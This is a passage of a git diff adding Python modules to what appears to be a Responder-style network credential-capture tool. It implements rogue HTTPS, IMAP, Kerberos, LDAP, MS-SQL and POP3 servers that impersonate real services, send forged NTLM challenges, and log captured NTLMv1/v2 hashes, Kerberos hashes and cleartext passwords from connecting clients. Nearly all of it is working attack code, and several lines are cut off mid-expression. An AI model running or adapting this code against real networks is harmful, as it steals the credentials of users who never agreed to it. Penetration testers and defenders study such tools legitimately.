def serve_thread_SSL(host, port, handler): + try: + server = SSlSock((host, port), handler) + server.serve_forever() + except Exception, e: + print "Error starting TCP server on port %s: %s:" % (str(port),str(e)) + + #Function name self-explanatory + def start(SSL_On_Off): + if SSL_On_Off == "ON": + t = threading.Thread(name="SSL", target=self.serve_thread_SSL, args=("0.0.0.0", 443,DoSSL)) + t.setDaemon(True) + t.start() + return t + if SSL_On_Off == "OFF": + return False + +class SSlSock(ThreadingMixIn, TCPServer): + def __init__(self, server_address, RequestHandlerClass): + BaseServer.__init__(self, server_address, RequestHandlerClass) + ctx = SSL.Context(SSL.SSLv3_METHOD) + ctx.use_privatekey_file(SSLkey) + ctx.use_certificate_file(SSLcert) + self.socket = SSL.Connection(ctx, socket.socket(self.address_family, self.socket_type)) + self.server_bind() + self.server_activate() + + def shutdown_request(self,request): + try: + request.shutdown() + except: + pass + +class DoSSL(StreamRequestHandler): + def setup(self): + self.exchange = self.request + self.rfile = socket._fileobject(self.request, "rb", self.rbufsize) + self.wfile = socket._fileobject(self.request, "wb", self.wbufsize) + + def handle(self): + try: + while True: + data = self.exchange.recv(8092) + self.exchange.settimeout(0.5) + buff = WpadCustom(data,self.client_address[0]) + if buff: + self.exchange.send(buff) + else: + buffer0 = HTTPSPacketSequence(data,self.client_address[0]) + self.exchange.send(buffer0) + except: + pass + +#Parse NTLMv1/v2 hash. +def ParseHTTPSHash(data,client): + LMhashLen = struct.unpack(' 24: + #print "[+]HTTPS NTLMv2 hash captured from :",client + responder_logger.info('[+]HTTPS NTLMv2 hash captured from :%s'%(client)) + NthashLen = 64 + DomainLen = struct.unpack('. +import struct +from odict import OrderedDict + +class Packet(): + fields = OrderedDict([ + ("data", ""), + ]) + def __init__(self, **kw): + self.fields = OrderedDict(self.__class__.fields) + for k,v in kw.items(): + if callable(v): + self.fields[k] = v(self.fields[k]) + else: + self.fields[k] = v + def __str__(self): + return "".join(map(str, self.fields.values())) + +#IMAP4 Greating class +class IMAPGreating(Packet): + fields = OrderedDict([ + ("Code", "* OK IMAP4 service is ready."), + ("CRLF", "\r\n"), + ]) + +#IMAP4 Capability class +class IMAPCapability(Packet): + fields = OrderedDict([ + ("Code", "* CAPABILITY IMAP4 IMAP4rev1 AUTH=PLAIN"), + ("CRLF", "\r\n"), + ]) + +#IMAP4 Capability class +class IMAPCapabilityEnd(Packet): + fields = OrderedDict([ + ("Tag", ""), + ("Message", " OK CAPABILITY completed."), + ("CRLF", "\r\n"), + ]) diff --git a/core/protocols/imap/IMAPServer.py b/core/protocols/imap/IMAPServer.py new file mode 100644 index 0000000..a05afc6 --- /dev/null +++ b/core/protocols/imap/IMAPServer.py @@ -0,0 +1,58 @@ +################################################################################## +#IMAP4 Stuff starts here +################################################################################## + + +class IMAPServer(): + + def serve_thread_tcp(host, port, handler): + try: + server = ThreadingTCPServer((host, port), handler) + server.serve_forever() + except Exception, e: + print "Error starting TCP server on port %s: %s:" % (str(port),str(e)) + + #Function name self-explanatory + def start(IMAP_On_Off): + if IMAP_On_Off == "ON": + t = threading.Thread(name="IMAP", target=self.serve_thread_tcp, args=("0.0.0.0", 143,IMAP)) + t.setDaemon(True) + t.start() + + if IMAP_On_Off == "OFF": + return False + +class ThreadingTCPServer(ThreadingMixIn, TCPServer): + + allow_reuse_address = 1 + + def server_bind(self): + TCPServer.server_bind(self) + +#ESMTP server class. +class IMAP(BaseRequestHandler): + + def handle(self): + try: + self.request.send(str(IMAPGreating())) + data = self.request.recv(1024) + if data[5:15] == "CAPABILITY": + RequestTag = data[0:4] + self.request.send(str(IMAPCapability())) + self.request.send(str(IMAPCapabilityEnd(Tag=RequestTag))) + data = self.request.recv(1024) + if data[5:10] == "LOGIN": + Credentials = data[10:].strip() + Outfile = "./logs/responder/IMAP-Clear-Text-Password-"+self.client_address[0]+".txt" + WriteData(Outfile,Credentials, Credentials) + #print '[+]IMAP Credentials from %s. ("User" "Pass"): %s'%(self.client_address[0],Credentials) + responder_logger.info('[+]IMAP Credentials from %s. ("User" "Pass"): %s'%(self.client_address[0],Credentials)) + self.request.send(str(ditchthisconnection())) + data = self.request.recv(1024) + + except Exception: + pass + +################################################################################## +#IMAP4 Stuff ends here +################################################################################## \ No newline at end of file diff --git a/core/protocols/imap/__init__.py b/core/protocols/imap/__init__.py new file mode 100644 index 0000000..e69de29 diff --git a/core/protocols/kerberos/KERBServer.py b/core/protocols/kerberos/KERBServer.py new file mode 100644 index 0000000..40b509f --- /dev/null +++ b/core/protocols/kerberos/KERBServer.py @@ -0,0 +1,163 @@ +################################################################################## +#Kerberos Server stuff starts here +################################################################################## + +class KERBServer(): + + def serve_thread_udp(host, port, handler): + try: + server = ThreadingUDPServer((host, port), handler) + server.serve_forever() + except Exception, e: + print "Error starting UDP server on port %s: %s:" % (str(port),str(e)) + + def serve_thread_tcp(host, port, handler): + try: + server = ThreadingTCPServer((host, port), handler) + server.serve_forever() + except Exception, e: + print "Error starting TCP server on port %s: %s:" % (str(port),str(e)) + + #Function name self-explanatory + def start(Krb_On_Off): + if Krb_On_Off == "ON": + t1 = threading.Thread(name="KerbUDP", target=serve_thread_udp, args=("0.0.0.0", 88,KerbUDP)) + t2 = threading.Thread(name="KerbTCP", target=serve_thread_tcp, args=("0.0.0.0", 88, KerbTCP)) + for t in [t1,t2]: + t.setDaemon(True) + t.start() + + return t1, t2 + if Krb_On_Off == "OFF": + return False + +class ThreadingUDPServer(ThreadingMixIn, UDPServer): + + allow_reuse_address = 1 + + def server_bind(self): + UDPServer.server_bind(self) + +class ThreadingTCPServer(ThreadingMixIn, TCPServer): + + allow_reuse_address = 1 + + def server_bind(self): + TCPServer.server_bind(self) + +def ParseMSKerbv5TCP(Data): + MsgType = Data[21:22] + EncType = Data[43:44] + MessageType = Data[32:33] + if MsgType == "\x0a" and EncType == "\x17" and MessageType =="\x02": + if Data[49:53] == "\xa2\x36\x04\x34" or Data[49:53] == "\xa2\x35\x04\x33": + HashLen = struct.unpack('. + +import struct +from odict import OrderedDict + +class Packet(): + fields = OrderedDict([ + ("data", ""), + ]) + def __init__(self, **kw): + self.fields = OrderedDict(self.__class__.fields) + for k,v in kw.items(): + if callable(v): + self.fields[k] = v(self.fields[k]) + else: + self.fields[k] = v + def __str__(self): + return "".join(map(str, self.fields.values())) + + +class LDAPSearchDefaultPacket(Packet): + fields = OrderedDict([ + ("ParserHeadASNID", "\x30"), + ("ParserHeadASNLen", "\x0c"), + ("MessageIDASNID", "\x02"), + ("MessageIDASNLen", "\x01"), + ("MessageIDASNStr", "\x0f"), + ("OpHeadASNID", "\x65"), + ("OpHeadASNIDLen", "\x07"), + ("SearchDoneSuccess", "\x0A\x01\x00\x04\x00\x04\x00"),#No Results. + ]) + +class LDAPSearchSupportedCapabilitiesPacket(Packet): + fields = OrderedDict([ + ("ParserHeadASNID", "\x30"), + ("ParserHeadASNLenOfLen", "\x84"), + ("ParserHeadASNLen", "\x00\x00\x00\x7e"),#126 + ("MessageIDASNID", "\x02"), + ("MessageIDASNLen", "\x01"), + ("MessageIDASNStr", "\x02"), + ("OpHeadASNID", "\x64"), + ("OpHeadASNIDLenOfLen", "\x84"), + ("OpHeadASNIDLen", "\x00\x00\x00\x75"),#117 + ("ObjectName", "\x04\x00"), + ("SearchAttribASNID", "\x30"), + ("SearchAttribASNLenOfLen", "\x84"), + ("SearchAttribASNLen", "\x00\x00\x00\x6d"),#109 + ("SearchAttribASNID1", "\x30"), + ("SearchAttribASN1LenOfLen", "\x84"), + ("SearchAttribASN1Len", "\x00\x00\x00\x67"),#103 + ("SearchAttribASN2ID", "\x04"), + ("SearchAttribASN2Len", "\x15"),#21 + ("SearchAttribASN2Str", "supportedCapabilities"), + ("SearchAttribASN3ID", "\x31"), + ("SearchAttribASN3LenOfLen", "\x84"), + ("SearchAttribASN3Len", "\x00\x00\x00\x4a"), + ("SearchAttrib1ASNID", "\x04"), + ("SearchAttrib1ASNLen", "\x16"),#22 + ("SearchAttrib1ASNStr", "1.2.840.113556.1.4.800"), + ("SearchAttrib2ASNID", "\x04"), + ("SearchAttrib2ASNLen", "\x17"),#23 + ("SearchAttrib2ASNStr", "1.2.840.113556.1.4.1670"), + ("SearchAttrib3ASNID", "\x04"), + ("SearchAttrib3ASNLen", "\x17"),#23 + ("SearchAttrib3ASNStr", "1.2.840.113556.1.4.1791"), + ("SearchDoneASNID", "\x30"), + ("SearchDoneASNLenOfLen", "\x84"), + ("SearchDoneASNLen", "\x00\x00\x00\x10"),#16 + ("MessageIDASN2ID", "\x02"), + ("MessageIDASN2Len", "\x01"), + ("MessageIDASN2Str", "\x02"), + ("SearchDoneStr", "\x65\x84\x00\x00\x00\x07\x0a\x01\x00\x04\x00\x04\x00"), + ## No need to calculate anything this time, this packet is generic. + ]) + +class LDAPSearchSupportedMechanismsPacket(Packet): + fields = OrderedDict([ + ("ParserHeadASNID", "\x30"), + ("ParserHeadASNLenOfLen", "\x84"), + ("ParserHeadASNLen", "\x00\x00\x00\x60"),#96 + ("MessageIDASNID", "\x02"), + ("MessageIDASNLen", "\x01"), + ("MessageIDASNStr", "\x02"), + ("OpHeadASNID", "\x64"), + ("OpHeadASNIDLenOfLen", "\x84"), + ("OpHeadASNIDLen", "\x00\x00\x00\x57"),#87 + ("ObjectName", "\x04\x00"), + ("SearchAttribASNID", "\x30"), + ("SearchAttribASNLenOfLen", "\x84"), + ("SearchAttribASNLen", "\x00\x00\x00\x4f"),#79 + ("SearchAttribASNID1", "\x30"), + ("SearchAttribASN1LenOfLen", "\x84"), + ("SearchAttribASN1Len", "\x00\x00\x00\x49"),#73 + ("SearchAttribASN2ID", "\x04"), + ("SearchAttribASN2Len", "\x17"),#23 + ("SearchAttribASN2Str", "supportedSASLMechanisms"), + ("SearchAttribASN3ID", "\x31"), + ("SearchAttribASN3LenOfLen", "\x84"), + ("SearchAttribASN3Len", "\x00\x00\x00\x2a"),#42 + ("SearchAttrib1ASNID", "\x04"), + ("SearchAttrib1ASNLen", "\x06"),#6 + ("SearchAttrib1ASNStr", "GSSAPI"), + ("SearchAttrib2ASNID", "\x04"), + ("SearchAttrib2ASNLen", "\x0a"),#10 + ("SearchAttrib2ASNStr", "GSS-SPNEGO"), + ("SearchAttrib3ASNID", "\x04"), + ("SearchAttrib3ASNLen", "\x08"),#8 + ("SearchAttrib3ASNStr", "EXTERNAL"), + ("SearchAttrib4ASNID", "\x04"), + ("SearchAttrib4ASNLen", "\x0a"),#10 + ("SearchAttrib4ASNStr", "DIGEST-MD5"), + ("SearchDoneASNID", "\x30"), + ("SearchDoneASNLenOfLen", "\x84"), + ("SearchDoneASNLen", "\x00\x00\x00\x10"),#16 + ("MessageIDASN2ID", "\x02"), + ("MessageIDASN2Len", "\x01"), + ("MessageIDASN2Str", "\x02"), + ("SearchDoneStr", "\x65\x84\x00\x00\x00\x07\x0a\x01\x00\x04\x00\x04\x00"), + ## No need to calculate anything this time, this packet is generic. + ]) + +class LDAPNTLMChallenge(Packet): + fields = OrderedDict([ + ("ParserHeadASNID", "\x30"), + ("ParserHeadASNLenOfLen", "\x84"), + ("ParserHeadASNLen", "\x00\x00\x00\xD0"),#208 + ("MessageIDASNID", "\x02"), + ("MessageIDASNLen", "\x01"), + ("MessageIDASNStr", "\x02"), + ("OpHeadASNID", "\x61"), + ("OpHeadASNIDLenOfLen", "\x84"), + ("OpHeadASNIDLen", "\x00\x00\x00\xc7"),#199 + ("Status", "\x0A"), + ("StatusASNLen", "\x01"), + ("StatusASNStr", "\x0e"), #In Progress. + ("MatchedDN", "\x04\x00"), #Null + ("ErrorMessage", "\x04\x00"), #Null + ("SequenceHeader", "\x87"), + ("SequenceHeaderLenOfLen", "\x81"), + ("SequenceHeaderLen", "\x82"), #188 + ("NTLMSSPSignature", "NTLMSSP"), + ("NTLMSSPSignatureNull", "\x00"), + ("NTLMSSPMessageType", "\x02\x00\x00\x00"), + ("NTLMSSPNtWorkstationLen","\x1e\x00"), + ("NTLMSSPNtWorkstationMaxLen","\x1e\x00"), + ("NTLMSSPNtWorkstationBuffOffset","\x38\x00\x00\x00"), + ("NTLMSSPNtNegotiateFlags","\x15\x82\x89\xe2"), + ("NTLMSSPNtServerChallenge","\x81\x22\x33\x34\x55\x46\xe7\x88"), + ("NTLMSSPNtReserved","\x00\x00\x00\x00\x00\x00\x00\x00"), + ("NTLMSSPNtTargetInfoLen","\x94\x00"), + ("NTLMSSPNtTargetInfoMaxLen","\x94\x00"), + ("NTLMSSPNtTargetInfoBuffOffset","\x56\x00\x00\x00"), + ("NegTokenInitSeqMechMessageVersionHigh","\x05"), + ("NegTokenInitSeqMechMessageVersionLow","\x02"), + ("NegTokenInitSeqMechMessageVersionBuilt","\xce\x0e"), + ("NegTokenInitSeqMechMessageVersionReserved","\x00\x00\x00"), + ("NegTokenInitSeqMechMessageVersionNTLMType","\x0f"), + ("NTLMSSPNtWorkstationName","SMB12"), + ("NTLMSSPNTLMChallengeAVPairsId","\x02\x00"), + ("NTLMSSPNTLMChallengeAVPairsLen","\x0a\x00"), + ("NTLMSSPNTLMChallengeAVPairsUnicodeStr","smb12"), + ("NTLMSSPNTLMChallengeAVPairs1Id","\x01\x00"), + ("NTLMSSPNTLMChallengeAVPairs1Len","\x1e\x00"), + ("NTLMSSPNTLMChallengeAVPairs1UnicodeStr","SERVER2008"), + ("NTLMSSPNTLMChallengeAVPairs2Id","\x04\x00"), + ("NTLMSSPNTLMChallengeAVPairs2Len","\x1e\x00"), + ("NTLMSSPNTLMChallengeAVPairs2UnicodeStr","smb12.local"), + ("NTLMSSPNTLMChallengeAVPairs3Id","\x03\x00"), + ("NTLMSSPNTLMChallengeAVPairs3Len","\x1e\x00"), + ("NTLMSSPNTLMChallengeAVPairs3UnicodeStr","SERVER2008.smb12.local"), + ("NTLMSSPNTLMChallengeAVPairs5Id","\x05\x00"), + ("NTLMSSPNTLMChallengeAVPairs5Len","\x04\x00"), + ("NTLMSSPNTLMChallengeAVPairs5UnicodeStr","smb12.local"), + ("NTLMSSPNTLMChallengeAVPairs6Id","\x00\x00"), + ("NTLMSSPNTLMChallengeAVPairs6Len","\x00\x00"), + ]) + + def calculate(self): + + ##Convert strings to Unicode first... + self.fields["NTLMSSPNtWorkstationName"] = self.fields["NTLMSSPNtWorkstationName"].encode('utf-16le') + self.fields["NTLMSSPNTLMChallengeAVPairsUnicodeStr"] = self.fields["NTLMSSPNTLMChallengeAVPairsUnicodeStr"].encode('utf-16le') + self.fields["NTLMSSPNTLMChallengeAVPairs1UnicodeStr"] = self.fields["NTLMSSPNTLMChallengeAVPairs1UnicodeStr"].encode('utf-16le') + self.fields["NTLMSSPNTLMChallengeAVPairs2UnicodeStr"] = self.fields["NTLMSSPNTLMChallengeAVPairs2UnicodeStr"].encode('utf-16le') + self.fields["NTLMSSPNTLMChallengeAVPairs3UnicodeStr"] = self.fields["NTLMSSPNTLMChallengeAVPairs3UnicodeStr"].encode('utf-16le') + self.fields["NTLMSSPNTLMChallengeAVPairs5UnicodeStr"] = self.fields["NTLMSSPNTLMChallengeAVPairs5UnicodeStr"].encode('utf-16le') + + ###### Workstation Offset + CalculateOffsetWorkstation = str(self.fields["NTLMSSPSignature"])+str(self.fields["NTLMSSPSignatureNull"])+str(self.fields["NTLMSSPMessageType"])+str(self.fields["NTLMSSPNtWorkstationLen"])+str(self.fields["NTLMSSPNtWorkstationMaxLen"])+str(self.fields["NTLMSSPNtWorkstationBuffOffset"])+str(self.fields["NTLMSSPNtNegotiateFlags"])+str(self.fields["NTLMSSPNtServerChallenge"])+str(self.fields["NTLMSSPNtReserved"])+str(self.fields["NTLMSSPNtTargetInfoLen"])+str(self.fields["NTLMSSPNtTargetInfoMaxLen"])+str(self.fields["NTLMSSPNtTargetInfoBuffOffset"])+str(self.fields["NegTokenInitSeqMechMessageVersionHigh"])+str(self.fields["NegTokenInitSeqMechMessageVersionLow"])+str(self.fields["NegTokenInitSeqMechMessageVersionBuilt"])+str(self.fields["NegTokenInitSeqMechMessageVersionReserved"])+str(self.fields["NegTokenInitSeqMechMessageVersionNTLMType"]) + + ###### AvPairs Offset + CalculateLenAvpairs = str(self.fields["NTLMSSPNTLMChallengeAVPairsId"])+str(self.fields["NTLMSSPNTLMChallengeAVPairsLen"])+str(self.fields["NTLMSSPNTLMChallengeAVPairsUnicodeStr"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs1Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs1Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs1UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs2Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs2Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs2UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs3Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs3Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs3UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs5Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs5Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs5UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs6Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs6Len"]) + + ###### LDAP Packet Len + CalculatePacketLen = str(self.fields["MessageIDASNID"])+str(self.fields["MessageIDASNLen"])+str(self.fields["MessageIDASNStr"])+str(self.fields["OpHeadASNID"])+str(self.fields["OpHeadASNIDLenOfLen"])+str(self.fields["OpHeadASNIDLen"])+str(self.fields["Status"])+str(self.fields["StatusASNLen"])+str(self.fields["StatusASNStr"])+str(self.fields["MatchedDN"])+str(self.fields["ErrorMessage"])+str(self.fields["SequenceHeader"])+str(self.fields["SequenceHeaderLen"])+str(self.fields["SequenceHeaderLenOfLen"])+CalculateOffsetWorkstation+str(self.fields["NTLMSSPNtWorkstationName"])+CalculateLenAvpairs + + + OperationPacketLen = str(self.fields["Status"])+str(self.fields["StatusASNLen"])+str(self.fields["StatusASNStr"])+str(self.fields["MatchedDN"])+str(self.fields["ErrorMessage"])+str(self.fields["SequenceHeader"])+str(self.fields["SequenceHeaderLen"])+str(self.fields["SequenceHeaderLenOfLen"])+CalculateOffsetWorkstation+str(self.fields["NTLMSSPNtWorkstationName"])+CalculateLenAvpairs + + NTLMMessageLen = CalculateOffsetWorkstation+str(self.fields["NTLMSSPNtWorkstationName"])+CalculateLenAvpairs + + ##### LDAP Len Calculation: + self.fields["ParserHeadASNLen"] = struct.pack(">i", len(CalculatePacketLen)) + self.fields["OpHeadASNIDLen"] = struct.pack(">i", len(OperationPacketLen)) + self.fields["SequenceHeaderLen"] = struct.pack(">B", len(NTLMMessageLen)) + + ##### Workstation Offset Calculation: + self.fields["NTLMSSPNtWorkstationBuffOffset"] = struct.pack(" 10: + LMhashOffset = struct.unpack('i',data[2:6])[0] + MessageSequence = struct.unpack('i',data[11:15])[0] + LDAPVersion = struct.unpack('. +import struct +from odict import OrderedDict + +class Packet(): + fields = OrderedDict([ + ("data", ""), + ]) + def __init__(self, **kw): + self.fields = OrderedDict(self.__class__.fields) + for k,v in kw.items(): + if callable(v): + self.fields[k] = v(self.fields[k]) + else: + self.fields[k] = v + def __str__(self): + return "".join(map(str, self.fields.values())) + +#MS-SQL Pre-login packet class +class MSSQLPreLoginAnswer(Packet): + fields = OrderedDict([ + ("PacketType", "\x04"), + ("Status", "\x01"), + ("Len", "\x00\x25"), + ("SPID", "\x00\x00"), + ("PacketID", "\x01"), + ("Window", "\x00"), + ("TokenType", "\x00"), + ("VersionOffset", "\x00\x15"), + ("VersionLen", "\x00\x06"), + ("TokenType1", "\x01"), + ("EncryptionOffset", "\x00\x1b"), + ("EncryptionLen", "\x00\x01"), + ("TokenType2", "\x02"), + ("InstOptOffset", "\x00\x1c"), + ("InstOptLen", "\x00\x01"), + ("TokenTypeThrdID", "\x03"), + ("ThrdIDOffset", "\x00\x1d"), + ("ThrdIDLen", "\x00\x00"), + ("ThrdIDTerminator", "\xff"), + ("VersionStr", "\x09\x00\x0f\xc3"), + ("SubBuild", "\x00\x00"), + ("EncryptionStr", "\x02"), + ("InstOptStr", "\x00"), + ]) + + def calculate(self): + CalculateCompletePacket = str(self.fields["PacketType"])+str(self.fields["Status"])+str(self.fields["Len"])+str(self.fields["SPID"])+str(self.fields["PacketID"])+str(self.fields["Window"])+str(self.fields["TokenType"])+str(self.fields["VersionOffset"])+str(self.fields["VersionLen"])+str(self.fields["TokenType1"])+str(self.fields["EncryptionOffset"])+str(self.fields["EncryptionLen"])+str(self.fields["TokenType2"])+str(self.fields["InstOptOffset"])+str(self.fields["InstOptLen"])+str(self.fields["TokenTypeThrdID"])+str(self.fields["ThrdIDOffset"])+str(self.fields["ThrdIDLen"])+str(self.fields["ThrdIDTerminator"])+str(self.fields["VersionStr"])+str(self.fields["SubBuild"])+str(self.fields["EncryptionStr"])+str(self.fields["InstOptStr"]) + + VersionOffset = str(self.fields["TokenType"])+str(self.fields["VersionOffset"])+str(self.fields["VersionLen"])+str(self.fields["TokenType1"])+str(self.fields["EncryptionOffset"])+str(self.fields["EncryptionLen"])+str(self.fields["TokenType2"])+str(self.fields["InstOptOffset"])+str(self.fields["InstOptLen"])+str(self.fields["TokenTypeThrdID"])+str(self.fields["ThrdIDOffset"])+str(self.fields["ThrdIDLen"])+str(self.fields["ThrdIDTerminator"]) + + EncryptionOffset = VersionOffset+str(self.fields["VersionStr"])+str(self.fields["SubBuild"]) + + InstOpOffset = EncryptionOffset+str(self.fields["EncryptionStr"]) + + ThrdIDOffset = InstOpOffset+str(self.fields["InstOptStr"]) + + self.fields["Len"] = struct.pack(">h",len(CalculateCompletePacket)) + #Version + self.fields["VersionLen"] = struct.pack(">h",len(self.fields["VersionStr"]+self.fields["SubBuild"])) + self.fields["VersionOffset"] = struct.pack(">h",len(VersionOffset)) + #Encryption + self.fields["EncryptionLen"] = struct.pack(">h",len(self.fields["EncryptionStr"])) + self.fields["EncryptionOffset"] = struct.pack(">h",len(EncryptionOffset)) + #InstOpt + self.fields["InstOptLen"] = struct.pack(">h",len(self.fields["InstOptStr"])) + self.fields["EncryptionOffset"] = struct.pack(">h",len(InstOpOffset)) + #ThrdIDOffset + self.fields["ThrdIDOffset"] = struct.pack(">h",len(ThrdIDOffset)) + +#MS-SQL NTLM Negotiate packet class +class MSSQLNTLMChallengeAnswer(Packet): + fields = OrderedDict([ + ("PacketType", "\x04"), + ("Status", "\x01"), + ("Len", "\x00\xc7"), + ("SPID", "\x00\x00"), + ("PacketID", "\x01"), + ("Window", "\x00"), + ("TokenType", "\xed"), + ("SSPIBuffLen", "\xbc\x00"), + ("Signature", "NTLMSSP"), + ("SignatureNull", "\x00"), + ("MessageType", "\x02\x00\x00\x00"), + ("TargetNameLen", "\x06\x00"), + ("TargetNameMaxLen", "\x06\x00"), + ("TargetNameOffset", "\x38\x00\x00\x00"), + ("NegoFlags", "\x05\x02\x89\xa2"), + ("ServerChallenge", ""), + ("Reserved", "\x00\x00\x00\x00\x00\x00\x00\x00"), + ("TargetInfoLen", "\x7e\x00"), + ("TargetInfoMaxLen", "\x7e\x00"), + ("TargetInfoOffset", "\x3e\x00\x00\x00"), + ("NTLMOsVersion", "\x05\x02\xce\x0e\x00\x00\x00\x0f"), + ("TargetNameStr", "SMB"), + ("Av1", "\x02\x00"),#nbt name + ("Av1Len", "\x06\x00"), + ("Av1Str", "SMB"), + ("Av2", "\x01\x00"),#Server name + ("Av2Len", "\x14\x00"), + ("Av2Str", "SMB-TOOLKIT"), + ("Av3", "\x04\x00"),#Full Domain name + ("Av3Len", "\x12\x00"), + ("Av3Str", "smb.local"), + ("Av4", "\x03\x00"),#Full machine domain name + ("Av4Len", "\x28\x00"), + ("Av4Str", "server2003.smb.local"), + ("Av5", "\x05\x00"),#Domain Forest Name + ("Av5Len", "\x12\x00"), + ("Av5Str", "smb.local"), + ("Av6", "\x00\x00"),#AvPairs Terminator + ("Av6Len", "\x00\x00"), + ]) + + def calculate(self): + ##First convert to uni + self.fields["TargetNameStr"] = self.fields["TargetNameStr"].encode('utf-16le') + self.fields["Av1Str"] = self.fields["Av1Str"].encode('utf-16le') + self.fields["Av2Str"] = self.fields["Av2Str"].encode('utf-16le') + self.fields["Av3Str"] = self.fields["Av3Str"].encode('utf-16le') + self.fields["Av4Str"] = self.fields["Av4Str"].encode('utf-16le') + self.fields["Av5Str"] = self.fields["Av5Str"].encode('utf-16le') + ##Then calculate + + CalculateCompletePacket = str(self.fields["PacketType"])+str(self.fields["Status"])+str(self.fields["Len"])+str(self.fields["SPID"])+str(self.fields["PacketID"])+str(self.fields["Window"])+str(self.fields["TokenType"])+str(self.fields["SSPIBuffLen"])+str(self.fields["Signature"])+str(self.fields["SignatureNull"])+str(self.fields["MessageType"])+str(self.fields["TargetNameLen"])+str(self.fields["TargetNameMaxLen"])+str(self.fields["TargetNameOffset"])+str(self.fields["NegoFlags"])+str(self.fields["ServerChallenge"])+str(self.fields["Reserved"])+str(self.fields["TargetInfoLen"])+str(self.fields["TargetInfoMaxLen"])+str(self.fields["TargetInfoOffset"])+str(self.fields["NTLMOsVersion"])+str(self.fields["TargetNameStr"])+str(self.fields["Av1"])+str(self.fields["Av1Len"])+str(self.fields["Av1Str"])+str(self.fields["Av2"])+str(self.fields["Av2Len"])+str(self.fields["Av2Str"])+str(self.fields["Av3"])+str(self.fields["Av3Len"])+str(self.fields["Av3Str"])+str(self.fields["Av4"])+str(self.fields["Av4Len"])+str(self.fields["Av4Str"])+str(self.fields["Av5"])+str(self.fields["Av5Len"])+str(self.fields["Av5Str"])+str(self.fields["Av6"])+str(self.fields["Av6Len"]) + + CalculateSSPI = str(self.fields["Signature"])+str(self.fields["SignatureNull"])+str(self.fields["MessageType"])+str(self.fields["TargetNameLen"])+str(self.fields["TargetNameMaxLen"])+str(self.fields["TargetNameOffset"])+str(self.fields["NegoFlags"])+str(self.fields["ServerChallenge"])+str(self.fields["Reserved"])+str(self.fields["TargetInfoLen"])+str(self.fields["TargetInfoMaxLen"])+str(self.fields["TargetInfoOffset"])+str(self.fields["NTLMOsVersion"])+str(self.fields["TargetNameStr"])+str(self.fields["Av1"])+str(self.fields["Av1Len"])+str(self.fields["Av1Str"])+str(self.fields["Av2"])+str(self.fields["Av2Len"])+str(self.fields["Av2Str"])+str(self.fields["Av3"])+str(self.fields["Av3Len"])+str(self.fields["Av3Str"])+str(self.fields["Av4"])+str(self.fields["Av4Len"])+str(self.fields["Av4Str"])+str(self.fields["Av5"])+str(self.fields["Av5Len"])+str(self.fields["Av5Str"])+str(self.fields["Av6"])+str(self.fields["Av6Len"]) + + CalculateNameOffset = str(self.fields["Signature"])+str(self.fields["SignatureNull"])+str(self.fields["MessageType"])+str(self.fields["TargetNameLen"])+str(self.fields["TargetNameMaxLen"])+str(self.fields["TargetNameOffset"])+str(self.fields["NegoFlags"])+str(self.fields["ServerChallenge"])+str(self.fields["Reserved"])+str(self.fields["TargetInfoLen"])+str(self.fields["TargetInfoMaxLen"])+str(self.fields["TargetInfoOffset"])+str(self.fields["NTLMOsVersion"]) + + CalculateAvPairsOffset = CalculateNameOffset+str(self.fields["TargetNameStr"]) + + CalculateAvPairsLen = str(self.fields["Av1"])+str(self.fields["Av1Len"])+str(self.fields["Av1Str"])+str(self.fields["Av2"])+str(self.fields["Av2Len"])+str(self.fields["Av2Str"])+str(self.fields["Av3"])+str(self.fields["Av3Len"])+str(self.fields["Av3Str"])+str(self.fields["Av4"])+str(self.fields["Av4Len"])+str(self.fields["Av4Str"])+str(self.fields["Av5"])+str(self.fields["Av5Len"])+str(self.fields["Av5Str"])+str(self.fields["Av6"])+str(self.fields["Av6Len"]) + + self.fields["Len"] = struct.pack(">h",len(CalculateCompletePacket)) + self.fields["SSPIBuffLen"] = struct.pack(" 60: + DomainLen = struct.unpack('H',Data[2:4])[0] + EncryptionValue = Data[PacketLen-7:PacketLen-6] + if re.search("NTLMSSP",Data): + return True + else: + return False + +#MS-SQL server class. +class MSSQL(BaseRequestHandler): + + def handle(self): + try: + while True: + data = self.request.recv(1024) + self.request.settimeout(0.1) + ##Pre-Login Message + if data[0] == "\x12": + buffer0 = str(MSSQLPreLoginAnswer()) + self.request.send(buffer0) + data = self.request.recv(1024) + ##NegoSSP + if data[0] == "\x10": + if re.search("NTLMSSP",data): + t = MSSQLNTLMChallengeAnswer(ServerChallenge=Challenge) + t.calculate() + buffer1 = str(t) + self.request.send(buffer1) + data = self.request.recv(1024) + else: + ParseClearTextSQLPass(data,self.client_address[0]) + ##NegoSSP Auth + if data[0] == "\x11": + ParseSQLHash(data,self.client_address[0]) + except Exception: + pass + self.request.close() +################################################################################## +#SQL Stuff ends here +################################################################################## \ No newline at end of file diff --git a/core/protocols/mssql/__init__.py b/core/protocols/mssql/__init__.py new file mode 100644 index 0000000..e69de29 diff --git a/core/protocols/pop3/POP3Server.py b/core/protocols/pop3/POP3Server.py new file mode 100644 index 0000000..8e7d700 --- /dev/null +++ b/core/protocols/pop3/POP3Server.py @@ -0,0 +1,69 @@ +################################################################################## +#POP3 Stuff starts here +################################################################################## + +class POP3Server(): + + def serve_thread_tcp(host, port, handler): + try: + server = ThreadingTCPServer((host, port), handler) + server.serve_forever() + except Exception, e: + print "Error starting TCP server on port %s: %s:" % (str(port),str(e)) + + #Function name self-explanatory + def start(POP_On_Off): + if POP_On_Off == "ON": + t = threading.Thread(name="POP", target=serve_thread_tcp, args=("0.0.0.0", 110,POP)) + t.setDaemon(True) + t.start() + return t + if POP_On_Off == "OFF": + return False + +class ThreadingTCPServer(ThreadingMixIn, TCPServer): + + allow_reuse_address = 1 + + def server_bind(self): + 